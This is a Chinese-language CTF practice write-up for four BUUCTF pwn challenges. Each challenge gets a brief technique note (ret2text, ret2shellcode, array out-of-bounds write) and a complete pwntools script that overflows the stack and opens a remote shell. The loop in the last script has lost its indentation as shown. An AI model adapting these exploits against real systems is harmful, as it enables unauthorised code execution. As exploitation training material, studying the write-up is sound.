PWN-PRACTICE-BUUCTF-30
suctf_2018_stack
栈溢出,ret2text,返回地址不能直接是next_door的起始地址
设置返回地址为0x40067A,开始设置系统调用的参数以及系统调用号
from pwn import *
#context.log_level='debug'
#io=process('./SUCTF_2018_stack')
io=remote('node4.buuoj.cn',26579)
elf=ELF('./SUCTF_2018_stack')
shell=0x000000000040067A
io.recvuntil('============================\n')
payload='a'*(0x20+8)+p64(shell)
io.sendline(payload)
io.interactive()
wdb_2018_3rd_soEasy
给了输入在栈上的地址,且NX disabled,栈溢出ret2shellcode
from pwn import *
context.arch='i386'
#io=process('./wdb_2018_3rd_soEasy')
io=remote('node4.buuoj.cn',25581)
elf=ELF('./wdb_2018_3rd_soEasy')
io.recvuntil('a gift->0x')
addr=int(io.recvuntil('\n')[:-1],16)
io.recvuntil('to do?\n')
shellcode=asm(shellcraft.sh())
payload=shellcode.ljust(0x48+4,'a')+p32(addr)
io.sendline(payload)
io.interactive()
[BSidesCF 2019]Runit
栈溢出,ret2shellcode
from pwn import *
context.arch='i386'
#io=process('./BSidesCF_2019_Runit')
io=remote('node4.buuoj.cn',25615)
elf=ELF('./BSidesCF_2019_Runit')
shellcode=asm(shellcraft.sh())
io.recvuntil('stuff!!\n')
io.sendline(shellcode)
io.interactive()
qctf2018_stack2
数组越界写,ret2text
from pwn import *
#io=process('./qctf2018_stack2')
io=remote('node4.buuoj.cn',28396)
elf=ELF('./qctf2018_stack2')
io.sendlineafter('you have:\n','0')
offset=0x84
backdoor = [0x9b, 0x85, 0x04, 0x08]
for i in range(4):
io.sendlineafter('exit\n','3')
io.sendlineafter('change:\n',str(offset+i))
io.sendlineafter('number:\n',str(backdoor[i]))
io.sendlineafter('exit\n','5')
io.interactive()